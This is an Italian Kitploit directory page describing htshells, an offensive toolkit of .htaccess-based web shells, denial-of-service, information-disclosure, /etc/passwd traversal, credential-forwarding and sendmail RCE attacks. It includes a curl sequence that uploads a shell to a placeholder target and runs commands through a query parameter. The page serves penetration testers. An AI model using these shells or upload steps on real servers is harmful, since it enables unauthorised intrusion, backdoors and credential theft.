Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
htshells — Shell htaccess autocontenute e attacchi | Kitploit
Strumenti/GitHubGitHub/wireghoul/htshells
Strumenti di PhishingEscalation di PrivilegiGenerazione di PayloadExploitShellcodeSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubwireghoul/htshells

htshells

Shell htaccess autocontenute e attacchi

Vedi Repository
1.1k1954 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

HTSHELLS - Web shell autocontenute e altri attacchi tramite file .htaccess.

Gli attacchi sono nominati secondo il seguente schema, module.attack.htaccess e raggruppati per tipo di attacco in directory. Scegli quello che ti serve e copialo in un nuovo file chiamato .htaccess, controlla il file per vedere se necessita di modifiche prima di caricarlo. Le web shell eseguono i comandi dal parametro c della query, salvo diversa indicazione nel file.

Per prepararlo esegui ./prepare.sh file che genererà il file .htaccess da caricare. Esempio:

root@kitploit:~
$ ./prepare.sh shell/mod_php.shell.htaccess
┬ ┬┌┬┐┌─┐┬ ┬┌─┐┬  ┬  ┌─┐
├─┤ │ └─┐├─┤├┤ │  │  └─┐
┴ ┴ ┴ └─┘┴ ┴└─┘┴─┘┴─┘└─┘
 justanotherhacker.com

.htaccess file is ready
$ curl -F '[email protected]' -k https://target/upload.php
$ curl -k https://target/uploads/.htaccess?c=id
...
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

== DOS/ # Attacchi denial of service

  • apache.dos.htaccess Fa sì che tutte le richieste restituiscano un errore 500 internal server error

  • mod_rewrite.dos.htaccess Una condizione DoS tramite espressione regolare in mod_rewrite consuma un processo figlio

== INFO/ # Attacchi di divulgazione di informazioni

  • modcheck/ Include header di risposta aggiuntivi per indicare quali moduli Apache sono attivi

  • mod_caucho.info.htaccess non testato Binding dello stato del server per il modulo server java Resin mod_caucho

  • mod_clamav.info.htaccess Binding della pagina di stato di Clamav

  • mod_info.info.htaccess Binding delle informazioni del server per Apache

  • mod_ldap.info.htaccess non testato Binding dello stato del server per il modulo server mod_ldap

  • mod_perl.info.htaccess Mostra la pagina di stato di mod_perl

  • mod_php.info.htaccess Fa sì che tutte le pagine php mostrino il sorgente invece di eseguirlo

  • mod_status.info.htacces Binding dello stato del server per Apache

== SHELL/ # Esecuzione interattiva di comandi

  • mod_caucho.shell.htaccess non testato Web shell basata su JSP

  • mod_cgi.shell.bash.htaccess Shell che usa bash tramite l'handler cgi. Richiede che il flag exec sia impostato sul file htaccess.

  • mod_cgi.shell.windows.htaccess non testato Fornisce una shell tramite php.exe attraverso le direttive di configurazione cgi di Apache

  • mod_include.shell.htaccess Web shell basata su Server Side Include

  • mod_multi.shell.htaccess Più shell in un unico file .htaccess, un approccio "una soluzione per tutti"

  • mod_perl.shell.htaccess incompleto TODO

  • mod_php.shell.htaccess Accesso a web shell basata su PHP tramite http://domain/path/.htaccess?c=command

  • mod_php.shell2.htaccess Metodo alternativo per richiamare una shell php dal file .htaccess

  • mod_php.stealth.shell.htaccess Backdoor stealth basata su PHP - vedi http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html per il tutorial

  • mod_python.shell.htaccess

  • mod_ruby.shell.htaccess

  • mod_suphp.shell.htaccess

== TRAVERSAL/ # Attacchi di directory traversal

  • mod_hitlog.traversal.htaccess Attacco di directory traversal tramite il modulo hitlog che tenta di leggere /etc/passwd

  • mod_layout.traversal.htaccess Attacco di directory traversal che legge /etc/passwd

== ./ # Attacchi vari

  • mod_auth_remote.phish.htaccess non testato Inoltra le credenziali di autenticazione di base al server che preferisci

  • mod_badge.admin.htaccess Binding della pagina admin di mod_badge

  • mod_sendmail.rce.htaccess non testato Esegue i comandi configurati nel file .htaccess specificando percorso e argomenti del binario "sendmail"

Wireghoul - http://www.justanotherhacker.com

Scarica lo strumento